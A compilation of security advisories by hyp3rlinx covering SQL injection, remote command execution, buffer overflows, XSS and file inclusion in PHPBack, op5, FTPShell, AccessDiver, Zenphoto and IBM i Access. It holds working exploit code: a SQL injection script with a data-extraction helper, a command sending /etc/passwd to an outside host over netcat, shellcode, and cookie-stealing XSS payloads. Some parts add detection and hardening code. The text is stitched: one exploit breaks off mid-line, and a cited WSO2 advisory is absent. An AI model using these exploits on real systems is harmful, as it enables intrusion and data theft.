that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx


PHPBack v1.3.0 SQL Injection

2016-04-19 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PHPBACK-v1.3.0-SQL-INJECTION.txt




Vendor:

www.phpback.org



Product:

PHPBack v1.3.0



Vulnerability Type:
===
SQL Injection




CVE Reference:
==
N/A



Vulnerability Details:
=

PHPBack v1.3.0 is vulnerable to boolean-blind and error-based SQL Injection in 
the 'orderby' parameter.
By injecting a query that uses the MySQL XPath function ExtractValue() we can 
read data out of the errors it generates.

This is useful when the page returns no output except MySQL errors: we can force 
data extraction through the error itself.
When ExtractValue() is given an invalid XPath expression, the evaluated result of
our subquery is embedded in the error message. Prefixing the expression with a
character that can never start a valid XPath (the PoC below uses a newline, 0x0a;
a colon, 0x3a, works just as well) guarantees that parsing always FAILS, generating
an error that carries our extracted data. This method only works on MySQL
version >= 5.1; LIMIT can then be used to step through the database row by row.


Users should upgrade to v1.3.1
https://github.com/ivandiazwm/phpback/releases



Exploit code(s):
===

Run from CL...

<?php
# PHPBack v1.3.0 SQL Injection POC - MySQL >= 5.1 only
#

$email=$argv[1];
$pwd=$argv[2];

if($argc<3){
echo "PHPBack 1.3.0 SQL Injection POC\r\n";
echo "Outputs USER(), DATABASE() and VERSION() on XPATH Error!\r\n";
echo "Supported in MySQL >= 5.1 versions only\r\n";
echo "==\r\n";
echo "Enter Creds: <email> <password>\r\n";
echo "*** by hyp3rlinx *** \r\n";
exit();
}

$target="localhost";
# login form fields: 'email' per the advisory; the password field name is assumed
$creds="email=$email&password=$pwd"; 

$fp = fsockopen($target, 80, $errno, $errstr, 30);
sock_chk($fp);

#authenticate
$out = "POST /phpback-1.3.0/action/login HTTP/1.0\r\n";
$out .= "Host: $target\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($creds) . "\r\n";
$out .= "Connection: Close\r\n\r\n";

fwrite($fp, $out);
fwrite($fp, $creds);
$phpsess="";
$res="";

#read the response headers only, the Set-Cookie session id is all we need
while (!feof($fp)) {
$res .= fgets($fp, 128);
if(strpos($res,"\r\n\r\n")!==FALSE){break;}
}
fclose($fp);

$sess=get_session($fp);

function get_session($sock){
global $res;
#"PHPSESSID=" plus the session id, taken from the Set-Cookie header
$idx=strpos($res,"PHPSESSID");
$sess=substr($res,$idx,38);
return $sess;
}

#SQL Injection in the 'orderby' parameter: the XPath argument starts with 0x0a,
#so ExtractValue() always fails and its error message carries our data
$sql="search=1&orderby=title,extractvalue(0x0a,concat(0x0a,(select USER()),0x0a,(select DATABASE()),0x0a,(select VERSION())))\r\n";

$fp = fsockopen($target, 80, $errno, $errstr, 30);
sock_chk($fp);

$out = "POST /phpback-1.3.0/admin/ideas HTTP/1.0\r\n";
$out .= "Host: $target\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($sql) . "\r\n";
$out .= "Cookie: " . $sess."\r\n";
$out .= "Connection: Close\r\n\r\n";

fwrite($fp, $out);
fwrite($fp, $sql);

#the MySQL error in the response body contains USER(), DATABASE() and VERSION()
while (!feof($fp)) {
echo fgets($fp, 128);
}
fclose($fp);

function sock_chk(&$fp){
if (!$fp) {echo "Cant connect!";exit();} 
}

?> 
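The PoC above pulls three values in one error. What it does not show is the limit that shapes real extraction: MySQL prints at most 32 characters of the bad XPath in its error message, and the first one is the 0x0a marker, so 31 characters of data come back per request and longer values must be fetched with substring() in steps. The following is an added example (not the advisory's script) of that chunked retrieval; the vulnerable endpoint is replaced by a constructed stand-in that answers with the error text MySQL would produce for a fixed value.

```python
import re

# 32-character error window minus the leading 0x0a marker.
CHUNK = 31


def build_orderby_payload(expr, offset=1):
    """Value for the 'orderby' parameter: a valid column first, then ExtractValue()
    whose XPath argument starts with a newline and therefore never parses."""
    return (f"title,extractvalue(0x0a,concat(0x0a,"
            f"substring(({expr}),{offset},{CHUNK})))")


ERROR_RE = re.compile(r"XPATH syntax error: '\n?(.*?)'", re.S)


def parse_xpath_error(body):
    """Pull the leaked data out of a response body containing the MySQL error."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None


def reassemble(fetch, expr):
    """Drive fetch(payload) -> response body until the value is exhausted."""
    out, offset = "", 1
    while True:
        piece = parse_xpath_error(fetch(build_orderby_payload(expr, offset)))
        if not piece:
            break
        out += piece
        if len(piece) < CHUNK:          # last, short chunk
            break
        offset += CHUNK
    return out


# Constructed stand-in for the vulnerable /admin/ideas handler: it "evaluates" the
# substring() against a fixed value and returns the error text MySQL would emit.
SECRET = "regadmin@localhost|phpback|5.6.30-log"
OFFSET_RE = re.compile(r"substring\(\(.*\),(\d+),%d\)" % CHUNK)


def fake_server(payload):
    m = OFFSET_RE.search(payload)
    if not m:
        return "<html>ideas list</html>"
    start = int(m.group(1)) - 1          # SQL substring() offsets are 1-based
    return "XPATH syntax error: '\n%s'" % SECRET[start:start + CHUNK]


if __name__ == "__main__":
    print(reassemble(fake_server,
                     "select concat(user(),0x7c,database(),0x7c,version())"))
```

Against a live target, fetch() is the authenticated POST from the PoC with the payload as the orderby value; rows beyond the first are reached by adding LIMIT n,1 to the subquery and looping n.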



Disclosure Timeline:
=
Vendor Notification: April 17, 2016
Vendor Confirms: April 17, 2016
Vendor Release Fixed Version: April 19, 2016
April 19, 2016 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Medium



Description:
==

Request Method(s):[+]  POST


Vulnerable Product:   [+] PHPBack v1.3.0


Vulnerable Parameter(s):  [+] 'orderby'



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere. All content (c) hyp3rlinx.

by hyp3rlinx


op5 v7.1.9 Remote Command Execution

2016-04-05 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/OP5-REMOTE-CMD-EXECUTION.txt



Vendor:

www.op5.com



Product:
===
op5 v7.1.9

op5 Monitor is a software product for server, Network monitoring and management 
based on the open source Project Nagios.



Vulnerability Type:

Remote Command Execution




CVE Reference:
==
N/A



Vulnerability Details:
=

op5 has a CSRF entry point that executes arbitrary commands on the op5 system when 
they are sent via HTTP GET requests, allowing attackers
to completely take over the affected host. To be victimized a user must be 
authenticated to op5 and visit a malicious webpage or click an infected link...

Reference:
https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/


Exploit code(s):
===

trivial RCE cat /etc/passwd... using netcat

nc.exe  -vvlp  > passwds.txt

https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20|%20nc%20192.168.1.102%20


result:

listening on [any]  ...
192.168.1.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.1.102] from (UNKNOWN) [192.168.1.103] 56935: NO_DAT
 sent 0, rcvd 1343

C:\netcat-win32-1.12>type passwds.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smstools:x:499:499::/var/lib/smstools:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
op5lsu:x:500:500::/home/op5lsu:/bin/bash
saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
monitor:x:299:48::/opt/monitor:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
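Because the request is a plain GET that the victim's own browser issues, the only records of the attack are in the op5 web server log, where the source IP is the victim's and the attacker appears only as the netcat target inside cmd_str. The following is an added example (not part of the advisory, and not an op5 component) of detection logic over Apache combined-format log lines: it flags requests to command_test.php whose cmd_str carries shell metacharacters or that were not referred from the op5 UI. The log lines are constructed; the op5 origin and the listener port 4444 are assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

OP5_ORIGIN = "https://192.168.1.103/"        # assumed: the op5 host in the advisory
COMMAND_TEST = "/monitor/op5/nacoma/command_test.php"

# Apache combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$')
# Pipes, separators, redirects, backticks and $( ) have no business in a plugin test;
# a bare $ is left alone because Nagios macros look like $USER1$.
SHELL_META = re.compile(r"[|;&`<>]|\$\(")


def find_command_test_abuse(log_text):
    """Return the command_test.php requests that look like the CSRF/RCE described above."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != COMMAND_TEST:
            continue
        referer = m.group("referer")
        for cmd in parse_qs(url.query).get("cmd_str", []):    # percent-decoded
            reasons = []
            if SHELL_META.search(cmd):
                reasons.append("shell metacharacters in cmd_str")
            if not referer.startswith(OP5_ORIGIN):
                reasons.append("request not referred from the op5 UI")
            if reasons:
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "cmd": cmd, "reasons": reasons})
    return hits


# Constructed lines: a legitimate plugin test from the UI, the advisory's payload
# arriving via a lure page (the victim at .50 sends it; .102 is the attacker's
# listener), and an unrelated request.
SAMPLE_LOG = """\
192.168.1.50 - - [27/Mar/2016:10:01:02 +0000] "GET /monitor/op5/nacoma/command_test.php?cmd_str=check_ping%20-H%20127.0.0.1 HTTP/1.1" 200 512 "https://192.168.1.103/monitor/op5/nacoma/" "Mozilla/5.0"
192.168.1.50 - - [27/Mar/2016:10:02:15 +0000] "GET /monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20|%20nc%20192.168.1.102%204444 HTTP/1.1" 200 1343 "http://evil.example/lure.html" "Mozilla/5.0"
192.168.1.50 - - [27/Mar/2016:10:03:00 +0000] "GET /monitor/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in find_command_test_abuse(SAMPLE_LOG):
        print(hit)
```

The referer check is a heuristic (browsers may strip it, and an attacker on the same host can set it), so treat the metacharacter match as the primary signal and the referer as corroboration.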



Disclosure Timeline:

Vendor Notification:  March 27, 2016
Vendor confirms vulnerability March 27, 2016
Vendor issue patched new release v7.2.0 April 5, 2016
April 6, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High




Description:
=


Request Method(s):[+] GET


Vulnerable Product:   [+] op5 v7.1.9


Vulnerable Parameter(s):  [+] 'cmd_str'

=

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

hyp3rlinx


FTPShell Client v5.24 Buffer Overflow

2015-12-30 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/FTPSHELL-v5.24-BUFFER-OVERFLOW.txt



Vendor:

www.ftpshell.com



Product:

FTPShell Client version 5.24

FTPShell client is a windows file transfer program that enables users to 
reliably transfer files,
upload to websites, and download updates from the internet.


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A




Vulnerability Details:
=
The ftpshell.exe client has a buffer overflow entry point in the 'Address' input 
field used to connect to an FTP server, allowing local arbitrary code execution:
the overflow overwrites several registers saved on the stack and gives control of 
program execution flow.
The EIP register is used to jump to our malicious shellcode, which is 
patiently waiting where the ECX register points.

exploited registers dump...

EAX 00000021
ECX 0012E5B0
EDX 76F670B4 ntdll.KiFastSystemCallRet
EBX 76244FC4 kernel32.76244FC4
ESP 0012E658 ASCII "calc.exe"   <- BAM!
EBP 7621E5FD kernel32.WinExec
ESI 001D2930
EDI 76244FEC kernel32.76244FEC
EIP 015FB945
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00200246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST C5E1  Cond 1 1 0 1  Err 1 1 1 0 0 0 0 1  (Unordered)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0


test stack dump

(3b8.fa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for ftpshell.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ftpshell.exe - 
eax=41414141 ebx=017ebc70 ecx=017ebc70 edx=0012ebc8 esi=0012ebc8 edi=017a9498
eip=41414141 esp=0012e928 ebp=0012ea70 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
41414141 ??              ???



Exploit code(s):
===

import struct

#FTPShell Client version 5.24 - www.ftpshell.com
#Buffer Overflow Exploit
#by hyp3rlinx
#run to generate payload, then copy and inject
#into the 'Address' field on the client and BOOM!

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


#payload="A"*2475+"R"*4+"\xcc"*100  #< control EIP register

#find appropriate assembly instruction to call our payload JMP or CALL ECX.
#!mona jmp -r ecx -m kernel32.dll

eip=struct.pack('

AccessDiver V4.301 Buffer Overflow

2015-12-27 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt



Vendor:
==
M. Jean Fages
www.accessdiver.com
circa 1998-2006


Product:
=
AccessDiver V4.301 build 5888


AccessDiver is a security tester for Web pages. It has a set of tools which
will verify the robustness of your accounts and directories. You will know whether
your customers, your users and you can use your web site safely.


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
=

AccessDiver is vulnerable to multiple buffer overflows; two vectors are 
described below.

1) Buffer overflow at 2073 bytes in the URL field for Server / IP address, which 
overwrites the NSEH and SEH exception handler pointers.

EAX 00000000
ECX 52525252
EDX 7C9037D8 ntdll.7C9037D8
EBX 00000000
ESP 0012EA08
EBP 0012EA28
ESI 00000000
EDI 00000000
EIP 52525252 <- BOOM
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 1272  Prec NEAR,53  Mask    1 1 0 0 1 0



2) Buffer overflow when loading a malicious "Exploit zone file" text file 
containing 2080 bytes: from the "Weak History" menu choose Import "from File", 
select the exploit text file and BOOM!


EAX 00000000
ECX 52525242
EDX 7702B4AD ntdll.7702B4AD
EBX 00000000
ESP 0018E940
EBP 0018E960
ESI 00000000
EDI 00000000
EIP 52525242  <- KABOOM
C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 1  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0


Windbg dump...

(2abc.2330): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=52525252 edx=7702b4ad esi=00000000 edi=00000000
eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
52525252 ??              ???



Disclosure Timeline:
=
Vendor Notification:  NA
December 26, 2015 : Public Disclosure




Exploitation Technique:
===
Local



Severity Level:

Med



===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


phpback v1.1 XSS vulnerability

2015-12-15 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/PHPBACK-XSS.txt



Vendor:

www.phpback.org



Product:
===
phpback v1.1

The open source feedback system. PHPBack is a feedback web application that you 
can easily implement on your website. It gives your customers a way to communicate 
their ideas to improve your products.



Vulnerability Type:
==
Cross site scripting - XSS



CVE Reference:
==
N/A



Vulnerability Details:
==
An XSS vulnerability exists in the search field's 'query' parameter, allowing arbitrary 
client-side JS code execution on victims who click our infected link or visit our 
infected webpage. Session ID theft may follow, as well as the possibility of 
bypassing CSRF protections etc...



XSS Exploit code(s):
===

<form id="InFeCT0r" action="http://localhost/phpback_v1.1/phpback-1.1c/home/search" method="POST">
  <input type="hidden" name="query" value="&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;">
</form>
<script>
document.getElementById('InFeCT0r').submit()
</script>




Disclosure Timeline:
=
Vendor Notification: December 11, 2015 
December 15, 2015  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High




Description:
=
Request Method(s):  [+] POST


Vulnerable Product: [+] phpback v1.1


Vulnerable Parameter(s):[+] query



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


Zenphoto 1.4.10 Local File Inclusion

2015-12-01 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-LFI.txt



Vendor:

www.zenphoto.org



Product:
===
Zenphoto 1.4.10




Vulnerability Type:

Local File Inclusion



CVE Reference:
==
N/A



Vulnerability Details:
==
Zenphoto's pluginDoc.php PHP file is vulnerable to local file inclusion that 
allows attackers to read arbitrary server files outside of the current web 
directory by injecting "../" directory traversal sequences into the 'extension'
parameter, which can lead to sensitive information disclosure, code execution 
or DoS on the victim's web server.


Local File Inclusion Codes:
==
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1&extension=../../../xampp/phpinfo
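The Zenphoto 'extension' parameter above and the WSO2 Carbon 'logFile' parameter earlier on this page fail the same way: a client value is joined onto a base directory and used without checking that the result stayed inside it. The following is an added example (not Zenphoto's or WSO2's code) that puts the unchecked join next to the contained one, with the traversal strings from both advisories as inputs. The deployment roots are assumed; the suffix argument models Zenphoto appending ".php" to the value it includes.

```python
import posixpath

# Assumed roots; the advisories only give the relative parts
# (/repository/logs for Carbon, the zp-core plugin directory for Zenphoto).
CARBON_LOG_DIR = "/opt/wso2carbon/repository/logs"
ZENPHOTO_PLUGIN_DIR = "/var/www/zenphoto/zp-core/plugins"


def resolve_unchecked(base, user_path, suffix=""):
    """What both affected handlers effectively do: join the client value onto
    the base directory and use the result, so '../' walks out of base."""
    return posixpath.normpath(posixpath.join(base, user_path + suffix))


def resolve_contained(base, user_path, suffix=""):
    """Hardened version: the normalised result must be a file strictly inside
    base. Returns the path, or None when the request must be refused."""
    if not user_path or "\x00" in user_path:
        return None
    if user_path.startswith("/") or "\\" in user_path:
        return None                          # absolute path or Windows separator
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path + suffix))
    if candidate == base or not candidate.startswith(base + "/"):
        return None                          # escaped via ../ (or named base itself)
    return candidate


if __name__ == "__main__":
    # constructed inputs: the two advisories' traversal strings and one normal name each
    for base, value, suffix in [
        (CARBON_LOG_DIR, "../../repository/conf/registry.xml", ""),
        (CARBON_LOG_DIR, "wso2carbon.log", ""),
        (ZENPHOTO_PLUGIN_DIR, "../../../xampp/phpinfo", ".php"),
        (ZENPHOTO_PLUGIN_DIR, "colorbox", ".php"),
    ]:
        print(value, "->", resolve_unchecked(base, value, suffix),
              "| contained:", resolve_contained(base, value, suffix))
```

Two points the offline check cannot cover: decode the parameter exactly once before checking it (the servlet container or PHP already did, so a second decode reopens the hole for %252e), and on a real filesystem compare realpath() results so a symlink inside base cannot point outside it.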



Disclosure Timeline:
=
Vendor Notification: November 10, 2015 
December 1, 2015  : Public Disclosure




Exploitation Technique:
===
Local



Severity Level:

High




Description:
=
Request Method(s):  [+] GET


Vulnerable Product: [+] Zenphoto 1.4.10


Vulnerable Parameter(s):[+] extension



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


Zenphoto 1.4.10 XSS Vulnerability

2015-12-01 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-XSS.txt



Vendor:

www.zenphoto.org



Product:
===
Zenphoto 1.4.10




Vulnerability Type:
==
Cross site scripting - XSS



CVE Reference:
==
N/A



Vulnerability Details:
==
Multiple XSS entry points exist, allowing arbitrary client-side JS code 
execution on victims who click our infected links. Session ID and data theft 
may follow, as well as the possibility of bypassing CSRF protections, 
injecting iframes to establish communication channels etc...



XSS Exploit code(s):
===

1)
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin-plugins.php?tab=%22%22%20onMouseMove=%22alert%28%27XSS%20hyp3rlinx%20Nov%205,%202015\n%27%2bdocument.cookie%29%22%20=666


2)
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin-options.php?page=options=plugin=%22%20onMouseMove=%22alert%28%27XSS%20hyp3rlinx\n%27%2bdocument.cookie%29%22

3)
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin.php?msg=hyp3rlinx=external=%22+onMouseMove%3D%22alert%28%27hyp3rlinx%20\n\n%20%27%2bdocument.cookie%29%3B




Disclosure Timeline:
=
Vendor Notification: November 10, 2015 
December 1, 2015  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High




Description:
=
Request Method(s):  [+] GET


Vulnerable Product: [+] Zenphoto 1.4.10


Vulnerable Parameter(s):[+] tab, single, error



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


IBM i Access Buffer Overflow Code DOS CVE-2015-7422

2015-11-19 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/IBMI-ACCESS-BUFFER-OVERFLOW-DOS.txt



Vendor:
==
www.ibm.com



Product:

IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected



Vulnerability Type:

Stack Buffer Overflow DOS



CVE Reference:
==
CVE-2015-7422



Vulnerability Details:
=
IBM i Access for Windows vulnerable to a buffer overflow, caused by improper 
bounds checking.
A local attacker could overflow a buffer and cause the program to crash.


Remediation/Fixes
The issue can be fixed by obtaining and applying the Service Pack SI57907.

The buffer overflow vulnerability can be remediated by applying Service Pack 
SI57907.

The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html

Workarounds and Mitigations
None known

CVSS Base Score: 4
CVSS Temporal Score: See 
https://exchange.xforce.ibmcloud.com/vulnerabilities/107770 for the current 
score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)



Disclosure Timeline:

Vendor Notification:  May 21, 2015
November 18, 2015  : Public Disclosure



Exploitation Technique:
===
Local 



Severity Level:

Med



Description:
==
Request Method(s):  [+] local  


Vulnerable Product: [+] IBM i Access for Windows Release 7.1


Affected Area(s):   [+] IBMI i Access



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


IBM i Access Buffer Overflow Code Exec CVE-2015-2023

2015-11-19 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt



Vendor:
==
www.ibm.com



Product:

IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected



Vulnerability Type:
===
Stack Buffer Overflow
Arbitrary Code Exec



CVE Reference:
==
CVE-2015-2023



Vulnerability Details:
=
IBM i Access for Windows is vulnerable to a buffer overflow. A local attacker 
could overflow a
buffer and execute arbitrary code on the Windows PC.

Client Access has the ability to receive remote commands via the "Cwbrxd.exe" service.
Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253 

"Incoming remote command was designed for running non-interactive commands and 
programs on a PC",
therefore a remote attacker could execute arbitrary code on the system.

Remediation/Fixes
The issue can be fixed by obtaining and applying the Service Pack SI57907.

The buffer overflow vulnerability can be remediated by applying Service Pack 
SI57907.

The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html

Workarounds and Mitigations
None known

CVSS Base Score: 4.4
CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the 
current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)


Exploit code(s):
==

Three Python PoC scripts follow that exploit various components of IBM i Access.


1) Exploits "ftdwprt.exe", direct EIP overwrite

import struct,os,subprocess

